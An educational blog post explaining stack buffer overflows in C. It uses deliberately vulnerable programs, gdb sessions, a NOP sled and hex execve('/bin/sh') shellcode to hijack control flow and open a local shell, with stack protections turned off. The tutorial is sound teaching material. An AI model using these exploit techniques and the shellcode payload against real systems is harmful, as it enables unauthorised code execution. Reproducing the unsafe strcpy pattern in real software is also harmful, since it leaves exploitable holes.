Buffer Overflows

Subscribe to get the latest posts sent to your email.

A buffer overflow is a type of security vulnerability that could be used to execute malicious code. Learn how it works in this blog post.

Variable overwriting

In its simplest form, a buffer overflow implementation overwrites parts of memory that, from a security and safety perspective, it should not have access to. Consider for example this small C program, which has an unused integer a, and copies the first command line argument to the buf array:

#include <stdio.h>  // printf
#include <string.h> // strcpy
int main(int argc, char *argv[]) {
  int a=0;
  char buf[5];
  strcpy(buf, argv[1]);
  printf (a!=0?"overwritten\n":"unchanged\n");
}

The integer a is initialized on the stack with value 0, after which a char array of size 5 is allocated on the stack. Because the function strcpy is used irresponsibly here, we can input more than 5 characters to overwrite the integer value on the stack. The printf function will show you if it was successful.

Compiling this with gcc -o buf buf.c and trying to overwrite the buffer with input “AAAAAA“, the program crashes with an error message:

$ ./buf AAAAA
unchanged
$ ./buf AAAAAA
unchanged
*** stack smashing detected ***: terminated
Aborted (core dumped)

The program was compiled by gcc to detect buffer overflows like this. It does so by putting “canaries” (named after the coal mine poison-detection mechanism), i.e., random values put between the program values and arrays on the stack, and having the binary check if they remain unchanged. Although this is a brilliant security measure, for educational purposes, we want to turn this compiler feature off by invoking gcc with the flag -fno-stack-protector.

$ gcc -o buf var.c -fno-stack-protector
$ ./buf AAAAA
unchanged
$ ./buf AAAAAA
overwritten

Pointer overwriting

As an attacker, it is more interesting to be able to execute code than to just overwrite some value. For now, let’s use a function that we define and compile ourselves:

#include<stdio.h>  //printf
#include<string.h> //strcpy
void malicious() {
  printf("malicious procedure\n");
}
void normal() {
  printf("normal procedure\n");
}
int main(int argc, char *argv[]) {
  void (*fun) () = normal;
  char buf[5];
  strcpy(buf,argv[1]);
  fun();
}

In the main function, the pointer fun points to the function normal and is executed at the end. The pointer is pushed to the stack before the char array buf. This allows us to overwrite the function pointer with the address of our malicious code. To find this address, we will use gdb:

$ gcc -o fun fun.c -fno-stackprotector
$ gdb fun
...
(gdb) run AAAA
normal procedure
[Inferior 1 (process 561710) exited normally]
(gdb) info function malicious
Non-debugging symbols:
0x0000555555555149  malicious

This address 0x0000555555555149, obtained by querying gdb with info function malicious, is the entry point of our malicious function. The leading 0x indicates a hexadecimal value. Every pair of hexadecimal digits represents one byte. We can convert this address into ASCII characters that we can input to overflow the buf array and overwrite the function pointer with the address we want:

echo 0000555555555159 -n | xxd -r -p | od -c

Or use an online tool such as this one. The resulting ASCII string is ^@^@UUUUQI, where ^@ denotes the NUL character. Copy or type in the obtained ASCII string and input it in your program. The NUL character can be obtained by drawing two NUL bytes from /dev/zero using head or dd:

(gdb) run $(echo "AAAAA$(head -c 2 /dev/zero)UUUUQY")
malicious procedure
(gdb) run $(echo "AAAAA$(dd if=/dev/zero bs=1 count=2)UUUUQY")
malicious procedure

If you get a segmentation fault and you don’t see the message “malicious procedure”, then you are probably working on a little-endian machine, and you should input the string of bytes in reverse:

(gdb) run $(echo "AAAAAYQUUUU$(head -c 2 /dev/zero)")
malicious procedure
(gdb) run $(echo "AAAAAYQUUUU$(dd if=/dev/zero bs=1 count=2)")
malicious procedure

Congrats! You have successfully executed “malicious code” by use of an overflow.

Overwriting Return Addresses

The function pointer fun that pointed to the normal procedure was pushed to the stack of the main function because we declared it ourselves. But we do not have to create a function pointer ourselves to execute our malicious function. When a function is called, a stack frame is created. Before the function is executed, a return address is pushed to the stack. This return address is a way for the processing unit to remember where to continue execution of the program after the function is finished.

Consider the following program:

#include<stdio.h>  // printf
#include<stdlib.h> // exit
#include<string.h> // strcpy

void malicious() {
  printf("malicious procedure\n");
  exit(0);
}
void normal() {
  printf("normal procedure\n");
}
void foo(char *src) {
  char buf[100];
  strcpy(buf,src);
  printf("%s\n",buf);
}
int main(int argc, char *argv[]) {
  foo(argv[1]);
  normal();
}

First, foo is executed. If buf is not overflowed then after foo is finished the processor will continue execution where it left off in the main function, and proceed to execute the function normal. However, we can overflow buf to overwrite the return address in the stack frame of foo to continue execution at the address we choose. For this, we just try a couple of lengths for our input strings of repeating A‘s, starting from 100. The number of A’s needed to overwrite the return address may differ per machine or compiler; in my case, I found the A’s started appearing in the return address after length 120 (the hexadecimal value of the character ‘A’ is 41):

$ gcc -o ret ret.c -fno-stack-protector
$ gdb ret
(gdb) run $(head -c 120 /dev/zero | tr '\0' 'A')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe538 in ?? ()
(gdb) run $(head -c 123 /dev/zero | tr '\0' 'A')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000555500414141 in ?? ()

So our attack plan is to put 120 A’s into the buffer, followed by the address of the function malicious:

(gdb) info function malicious
All functions matching regular expression "malicious":

Non-debugging symbols:
0x0000555555555159  malicious
(gdb) run $(echo "$(head -c 120 /dev/zero | tr '\0' 'A')$(echo 0000555555555159 -n | xxd -r -p)")
/bin/bash: line 1: warning: command substitution: ignored null byte in input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYQUUUU
malicious procedure
[Inferior 1 (process 666246) exited normally]

Remember that the address needs to be reverted on Little-Endian machines:

(gdb) run $(echo "$(head -c 120 /dev/zero | tr '\0' 'A')$(echo 0000555555555159 -n | xxd -r -p | rev)")

It’s funny how gdb reports successful termination. This is because we deceitfully ended our malicious function with exit(0).

Opening a Linux 64-bit Shell

Instead of having to compile a malicious function, we could fill the buffer with binary code that performs the same function. For example, we could fill the buffer with code that opens a shell for us. From this cool blog post, binary/assembly code that opens a shell on a Linux 64-bit machine is given by this hexadecimal string:

6a3b584831d249b82f2f62696e2f736849c1e80841504889e752574889e60f056a3c584831ff0f05

This peace of assembly makes a system call to execve with the string /bin/sh, which should open a shell for us. So how do we execute this with a buffer overflow? Consider the following program, which, like before, simply echos back the first command line argument, without properly checking its length:

#include <stdio.h>
#include <string.h>

void foo(char *src) {
  char buf[100];
  strcpy(buf,src);
  printf ("%s\n",buf);
}
int main(int argc, char *argv[]) {
  foo(argv[1]);
}

Like before, we have to find the return address in the stack frame of the function foo. This time, however, we don’t point to some other function, but we point inside the buffer, where we also put our assemble code that opens a shell. Using gdb, I find again that the return address is overwritten once we get past a string of As of length 120.

Our buffer overflow string will thus be of length 128 and look as follows:

  • 60 bytes containing the hex value 90;
  • 40 bytes containing the assembly for opening a shell;
  • 20 bytes of random data; and
  • 8 bytes with the address at which we wish to continue execution.

The first 60 bytes could be random too, but there is a good reason for picking hex value 90. If it is random data, we have to provide the 8 byte address pointing exactly to where our assembly code starts. But now we can point anywhere within the range of the 60 bytes of 0x90, because 0x90 is the NOP code (no operation), telling the processing unit to just skip to the next instruction. This initial range of NOP instructions is called the NOP sled.

First, we compile the program with gcc with flag -zexecstack, allowing the program to execute code on the stack.

$ gcc -o asm asm.c -fno-stack-protector -zexecstack

Next, we find that the return address (in my case, starting from 60+40+20=120):

$ gdb asm
...
(gdb) run $(printf "\x90%.0s" {1..60})$(echo 6a3b584831d249b82f2f62696e2f736849c1e80841504889e752574889e60f056a3c584831ff0f05 -n | xxd -r -p)$(printf "A%.0s" {1..23})
j;XH1�//bin/shI�APH�WH�j<XH1AAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000555500414141 in ?? ()

Here, I use printf "\x90%.0s" {1..60} to generate 60 NOP bytes. This is followed by the 40 bytes of code opening a shell, and finally, 23 As. We can see that 3 As appear in the return address. To figure out what address we use to overwrite the return address, we use the x command in gdb to find the NOP sled. We look at 100 four-byte words (x/100x), starting from 200 words before the stack pointer $rsp:

(gdb) x/100x $rsp-200
0x7fffffffe2a8:	0xffffe4a8	0x00007fff	0x00000002	0x00000000
0x7fffffffe2b8:	0x00000000	0x00000000	0xf7ffd000	0x00007fff
0x7fffffffe2c8:	0x55557dd8	0x00005555	0xffffe360	0x00007fff
0x7fffffffe2d8:	0x55555174	0x00005555	0x004a0000	0x00000000
0x7fffffffe2e8:	0xffffe7f5	0x00007fff	0x90909090	0x90909090
0x7fffffffe2f8:	0x90909090	0x90909090	0x90909090	0x90909090
0x7fffffffe308:	0x90909090	0x90909090	0x90909090	0x90909090
0x7fffffffe318:	0x90909090	0x90909090	0x90909090	0x90909090
0x7fffffffe328:	0x90909090	0x48583b6a	0xb849d231	0x69622f2f
0x7fffffffe338:	0x68732f6e	0x08e8c149	0x89485041	0x485752e7
0x7fffffffe348:	0x050fe689	0x48583c6a	0x050fff31	0x41414141
0x7fffffffe358:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffe368:	0x00414141	0x00005555	0xffffe4a8	0x00007fff
0x7fffffffe378:	0xffffe4a8	0x00000002	0xffffe420	0x00007fff
0x7fffffffe388:	0xf7dae488	0x00007fff	0xffffe3d0	0x00007fff
0x7fffffffe398:	0xffffe4a8	0x00007fff	0x55554040	0x00000002
0x7fffffffe3a8:	0x55555177	0x00005555	0xffffe4a8	0x00007fff
0x7fffffffe3b8:	0xafc58c2c	0xf6337170	0x00000002	0x00000000
0x7fffffffe3c8:	0x00000000	0x00000000	0xf7ffd000	0x00007fff
0x7fffffffe3d8:	0x55557dd8	0x00005555	0xa0a58c2c	0xf6337170
0x7fffffffe3e8:	0xaffb8c2c	0xf633613a	0x00000000	0x00007fff
0x7fffffffe3f8:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fffffffe408:	0x00000002	0x00000000	0xffffe4a0	0x00007fff
0x7fffffffe418:	0xa74d6e00	0xa0240718	0xffffe480	0x00007fff
0x7fffffffe428:	0xf7dae54c	0x00007fff	0xffffe4c0	0x00007fff

The NOP sled starts somewhere in the range of hex addresses ending in e2e8 and e328. Let’s pick 0x7fffffffe318 to start out shell-opening code (I’m on a Little-Endian machine, so I use the reversed byte order).

(gdb) run $(printf "\x90%.0s" {1..60})$(echo 6a3b584831d249b82f2f62696e2f736849c1e80841504889e752574889e60f056a3c584831ff0f05 -n | xxd -r -p)$(printf "A%.0s" {1..20})$(echo 18e3ffffff7f -n | xxd -r -p)
j;XH1�//bin/shI�APH�WH�j<XH1AAAAAAAAAAAAAAAAAAAA�
sh-5.2$

That’s it! A shell opened! Notice again that if we exit the shell, gdb reports a normal exit. Again, this is because the 40-byte assembly code ends with an exit(0) system call.


Subscribe to get the latest posts sent to your email.

Comments

Leave a reply!